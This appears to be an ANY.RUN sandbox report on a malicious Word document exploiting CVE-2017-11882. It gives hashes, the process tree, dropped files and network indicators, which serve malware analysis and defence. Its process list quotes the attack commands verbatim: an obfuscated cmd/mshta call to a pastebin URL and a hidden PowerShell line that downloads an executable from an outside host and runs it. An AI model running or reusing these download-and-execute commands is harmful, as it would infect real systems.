analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

06d038309382522dbd13574fddc26793.doc

Full analysis: https://app.any.run/tasks/7aa70431-6796-4b21-ad64-3af43f1d4fda
Verdict: Malicious activity
Analysis date: January 23, 2019, 09:48:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
Indicators:
MIME: application/octet-stream
File info: data
MD5:

06D038309382522DBD13574FDDC26793

SHA1:

6CBA7D9445911D5DFC679AA93B585AEA45973B7E

SHA256:

6583482CE262A237FC248E8E0B9EB52581FAC1865996BE77850615B2BB016DA0

SSDEEP:

192:6i27jaBAB7Y3xHSVce/QQiAJmzufkPqu3YHMj:t27jb7YBHNvwmK9cj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • KRQVHK.Exe (PID: 3020)
      • KRQVHK.Exe (PID: 2276)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 3260)

    • Executes PowerShell scripts

      • mshta.exe (PID: 2360)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 3260)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cMd.exe (PID: 3944)

    • Application launched itself

      • KRQVHK.Exe (PID: 3020)

    • Creates files in the user directory

      • powershell.exe (PID: 2224)
      • mshta.exe (PID: 2360)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2224)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 2360)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2876)

    • Application was crashed

      • EQNEDT32.EXE (PID: 3260)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2876)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe cmd.exe no specs mshta.exe powershell.exe krqvhk.exe no specs krqvhk.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2876"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\06d038309382522dbd13574fddc26793.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3260"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3944cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/H28nZ13UC:\Windows\system32\cMd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2360mSHta https://pastebin.com/raw/H28nZ13UC:\Windows\system32\mshta.exe
cMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2224"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://my.mixtape.moe/ishowl.htaa',$env:Temp+'\KRQVHK.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\KRQVHK.Exe')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3020"C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe" C:\Users\admin\AppData\Local\Temp\KRQVHK.Exepowershell.exe
User:
admin
Company:
WIMPS3
Integrity Level:
MEDIUM
Exit code:
0
Version:
4.05.0007
2276C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe" C:\Users\admin\AppData\Local\Temp\KRQVHK.ExeKRQVHK.Exe
User:
admin
Company:
WIMPS3
Integrity Level:
MEDIUM
Exit code:
0
Version:
4.05.0007
Total events
1 920
Read events
1 435
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
4
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
2876WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRECB6.tmp.cvr
MD5:
SHA256:
2224powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ET3AMC6BP3B51EO7M8FQ.temp
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{700E7C81-CAB8-4AC3-B180-FB3AFD783222}.tmp
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0B4C83C6-5501-47DD-B1AB-326D74EA6C66}.tmp
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{576A614F-C21C-4EB6-9D46-D72291918A7D}.tmp
MD5:
SHA256:
2876WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D512D016B6D8FC09C9D73080393CD633
SHA256:E12CC561D707114629B3DAA016753E27BBF4954359B14694E71C0926457DABF5
2224powershell.exeC:\Users\admin\AppData\Local\Temp\KRQVHK.Exeexecutable
MD5:494B14E7A620A733959E0520DCE37F38
SHA256:BACB3014CD18854FE5B5F0C12643AA7F9A136DFF00CF0EF2B6AA65C850795FE1
2360mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txttext
MD5:F4C1AFA857DC7FAFB1AB81B98C4F083E
SHA256:E9E591AA205A193ADB214E74DE21F552FCB4C22867C4533CD71D81701C48D108
2876WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AB80A426-2524-4C5C-BED8-1DFDE5A12155}.tmpbinary
MD5:3842B63E44EA20A68100B359D6AF7172
SHA256:CD55A9C307F65B328A7CE106EB75F66FCDD5C73078E497D0B22BD3BA289B1A77
2224powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f85e.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2224
powershell.exe
206.81.100.99:443
my.mixtape.moe
NapaNet
US
suspicious
2360
mshta.exe
104.20.208.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.208.21
  • 104.20.209.21
shared
my.mixtape.moe
  • 206.81.100.99
unknown

Threats

Found threats are available for the paid subscriptions
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
06d038309382522dbd13574fddc26793.doc